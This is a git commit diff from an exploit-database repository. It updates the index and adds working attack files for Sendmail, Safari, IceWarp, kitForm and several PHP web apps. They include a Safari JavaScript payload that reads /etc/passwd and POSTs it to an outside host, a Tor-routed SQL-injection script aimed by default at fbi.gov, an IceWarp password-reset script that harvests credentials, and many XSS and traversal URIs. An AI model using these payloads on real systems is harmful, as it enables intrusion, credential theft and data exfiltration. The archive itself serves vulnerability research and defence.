Updated 04_24_2014

This commit is contained in:
Offensive Security 2014-04-24 04:34:17 +00:00
parent 038ba787cc
commit 620b63e883
12 changed files with 333 additions and 1 deletions

View file

@ -29722,9 +29722,20 @@ id,file,description,date,author,platform,type,port
32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0
32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Dursun Ince",php,webapps,0
32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0
32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php, sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80
32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 'item.php' Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 'Forgot Password' Input Validation Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross Site Scripting Vulnerability",2009-05-05,DSecRG,multiple,remote,0
32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0
32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0
32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 'claroline/linker/notfound.php' Cross-Site Scripting Vulnerability",2009-05-08,"Gerendi Sandor Attila",php,webapps,0
32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 Cross Site Scripting And HTML Injection Vulnerabilities",2009-05-08,"Justin Klein Keane",php,webapps,0
32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0
32994,platforms/multiple/remote/32994.xml,"Apple Safari <= 3.2.2 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0
32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x 'X-header' Remote Heap Buffer Overflow Vulnerability",2009-05-27,"Simple Nomad",linux,dos,0

Can't render this file because it is too large.

53
platforms/linux/dos/32995.txt Executable file
View file

@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/34944/info
Sendmail is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
Successfully exploiting this issue may allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
Versions prior to Sendmail 8.13.2 are vulnerable.
$ telnet example.com 25
Trying ...
Connected to example.com.
Escape character is '^]'.
220 example.com ESMTP Sendmail 8.12.10/8.12.10; Fri, 3 Dec 2004 12:00:59 -06
00
mail from:example@example.org
250 2.1.0 example@example.org... Sender ok
rcpt to:example@example.com
250 2.1.5 example@example.com... Recipient ok
data
354 Enter mail, end with "." on a line by itself
X-Testing: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ123456AAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBB
BBX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
.
250 2.0.0 iB3I0xxp005530 Message accepted for delivery

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34829/info
Woodstock is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Woodstock 4.2 is vulnerable; other versions may also be affected.
http://www.example.com/theme/META-INF/>+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-

View file

@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/34925/info
Apple Safari is prone to multiple input-validation vulnerabilities.
An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.
Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.
These issues affect versions prior to Safari 3.2.3.
<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
<script>
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(?GET?, ?file:///etc/passwd?, true);
req.send(?);
function processReqChange() {
if (req.readyState == 4) {
contents = req.responseText;
sendit2XSSniper(contents);
}
}
function sendit2XSSniper(stuff){
var req2;
req2 = new XMLHttpRequest();
req2.open(?POST?, ?http://www.example.com?, true);
req2.setRequestHeader(?Content-Type?,'application/x-www-form-urlencoded?);
req2.send(?filename=etcpasswd&filecontents=?+escape(stuff));
}
</script>
</summary>

86
platforms/php/webapps/32983.txt Executable file
View file

@ -0,0 +1,86 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Happy easter..
* Product: phpManufaktur / kitForm
* Version: <= 0.43 (2013-11-22)
* Date: 2014-04-20
* Criticality: Medium
* Exploitable from: Remote
* Impact: SQL Injection
* Product URL: https://github.com/phpManufaktur/kitForm
1. Vendor Description:
kitForm is an extension for the Customer Relationship Management (CRM)
KeepInTouch and the Content Management Systems WebsiteBaker or LEPTON
CMS. It enables the easy creation of forms and dialogs for the CMS and
the CRM.
2. Vulnerability
A SQL injection error within the sorter.php file can be exploited by
unauthenticated people to conduct SQL injection attacks. The file does
not sanitize the "sorter_value" parameter before using the value in a
SQL query.
A successful exploit can extract database content and e.g.
administrative credentials (password hash).
22. $sorter_table = $_POST['sorter_table'];
23. switch ($sorter_table):
24. case 'mod_kit_form':
25. // Frageboegen sortieren
26. $rowIDs = implode(',', $_POST['rowID']);
27. $sorter_value = $_POST['sorter_value'];
28. $SQL = sprintf( "UPDATE %smod_kit_form_table_sort
SET sort_order='%s' WHERE sort_table='%s'
AND sort_value='%s'",
29. TABLE_PREFIX, $rowIDs, $sorter_table, $sorter_value);
30. $database->query($SQL);
3. Exploit
1. import httplib2, socks, urllib
2.
3. ### Change these values ###
4. target = "http://fbi.gov"
5. SQLi = "or 1=1 #"
6. tor_http_proxy = 8118
7.
8. httplib2.debuglevel=4
9.
10. headers = {
11. 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1;
zh-CN; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4',
12. 'Content-Type': 'application/x-www-form-urlencoded'
13. }
14. h = httplib2.Http(proxy_info = httplib2.ProxyInfo(
socks.PROXY_TYPE_HTTP, '127.0.0.1', tor_http_proxy, timeout=30)
15.
16. data = dict(
17. rowID = "1",
18. sorter_table = "mod_kit_form",
19. sorter_value = "AAAA' %s" % SQLi # <-- injection
20. )
21.
22. resp, content = h.request(
"%s" % target, "POST", urllib.urlencode(data), headers=headers)
23
24 print resp
25 print content
xoxo chapp
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQEcBAEBAgAGBQJTU9cEAAoJECKwmdefSHejw94H/384qa0OpLaF93UNisobw0rl
pp7Y6xKvfZn2mtYHxCCMzRmV2FngJHYP1L3pMTfB0VesLB49QBrzp5TOVDkvcoBx
q4D9VOXLxWteedH3S73+plvhKtbQZHAQ74PwY31F2idrzFO10oE4kw6UDDCdpxfq
Z6JVaJQAym3rDuRD20SAjp0opfP0BmijfNmuothfC9DzEQtzU44vWrac3ZSda+lL
VKVFr5NvRQ032G0CHvx+WT8yoFPnFxybwYFbW3Exr7QedjrM8eIpf47xgrzytM7i
sMWpBl/ZqdBkh1LrIin3lKuQgMIeHs+2Rb6Rbep72RKqVxfJy6AXPqhN0804GsU=
=AylG
-----END PGP SIGNATURE-----

32
platforms/php/webapps/32985.xml Executable file
View file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/34825/info
IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting</title>
<link
href="http://www.example.come"
rel="self"
type="application/rss+xml" />
<link>http://www.example.come</link>
<description>Seeing your network from the attacker&#039;s perspective</description>
<pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate>
<language>de</language>
<item>
<title>&lt;script&gt;alert(&#039;Title: Your session id is: &#039; +
window.top.sSID);&lt;/script&gt;</title>
<link>http://www.example.come/pentest</link>
<pubDate>Mon, 16 Apr 2009 05:23:42 +0000</pubDate>
<description>
&lt;div o&lt;xml&gt;nmouseover=&quot;alert(&#039;Description: Your session id is: &#039; +
window.top.sSID)&quot;&gt;
RedTeam Pentesting XSS
&lt;/div&gt;
</description>
</item>
</channel>
</rss>

51
platforms/php/webapps/32986.py Executable file
View file

@ -0,0 +1,51 @@
source: http://www.securityfocus.com/bid/34827/info
IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function.
Attackers can exploit this issue via social-engineering techniques to obtain valid users' login credentials; other attacks may also be possible.
#! /usr/bin/env python
import urllib2, sys
conf = {
"captcha_uid": "5989688782215156001239966846169",
"captcha": "4SJZ Z4GY",
"forgot": "user@example.com",
"replyto": "attacker@example.com",
"server": "http://www.example.com/webmail/server/webmail.php"
}
data = """
<iq type="set">
<query xmlns="webmail:iq:auth">
<forgot>%(forgot)s</forgot>
<captcha uid="%(captcha_uid)s">%(captcha)s</captcha>
<subject>
<![CDATA[
Account expiration %EMAIL%\r\nReply-To: %(replyto)s\n
]]>
</subject>
<message>
Dear %FULLNAME%,
your account
Username: %USERNAME%
Password: %PASSWORD%
has expired. To renew the account, please reply to this email
leaving the email body intact, so we know the account is still
used.
Kind regards,
the IT department
</message>
</query>
</iq>
""" % conf
req = urllib2.Request(conf['server'])
req.add_data(data)
res = urllib2.urlopen(req)
print repr(res.read())

12
platforms/php/webapps/32988.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/34845/info
VerliAdmin is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issues affect VerliAdmin 0.3.7 and 0.3.8; other versions may also be affected.
http//www.example.com/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>
http//www.example.com/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>
http//www.example.com/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>
http//www.example.com/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>

11
platforms/php/webapps/32989.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34856/info
Verlihub Control Panel is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issues affect Verlihub Control Panel 1.7e; other versions may also be affected.
http://www.example.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>
http://www.example.com/index.php?page=login&nick="><iframe src=
http://www.example.com/index.html?news></iframe>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34883/info
Claroline is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Claroline 1.8.11 is vulnerable; other versions may also be affected.
http://www.example.com/referer/?"><script>alert(123)</script><a%20href="

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34891/info
MagpieRSS is prone to multiple cross-site scripting issues and an HTML-injection issue because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
MagpieRSS 0.72 is vulnerable; other versions may also be affected.
http://www.example.com/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script http://www.example.com/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script <?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xml:base="http://www.example.com" xmlns:dc="http://purl.org/dc/elements/1.1/"> <channel> <title>Justin.MadIrish.net <script>alert('xss title');</script>- Justin&#039;s Personal Homepage</title> <link>http://www.example.com</link> <description>Close personal friends with Evil Eve.</description> <language>en</language> <item> <title>Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script></title> <link>http://www.example.com/node/343 <script>alert('xss link');</script></link> <description>foobar</description> <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate> <dc:creator>justin</dc:creator> <guid isPermaLink="false">343 at http://www.example.com</guid> </item> </channel> </rss>

15
platforms/php/webapps/32993.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/34906/info
Dacio's Image Gallery is prone to multiple remote vulnerabilities:
- An arbitrary-file-upload vulnerability
- An authentication-bypass vulnerability
- A directory-traversal vulnerability
An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or gain unauthorized access to the affected application.
Dacio's Image Gallery 1.6 is vulnerable; other versions may also be affected.
The following example URI for the directory-traversal vulnerability is available:
http://www.example.com/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00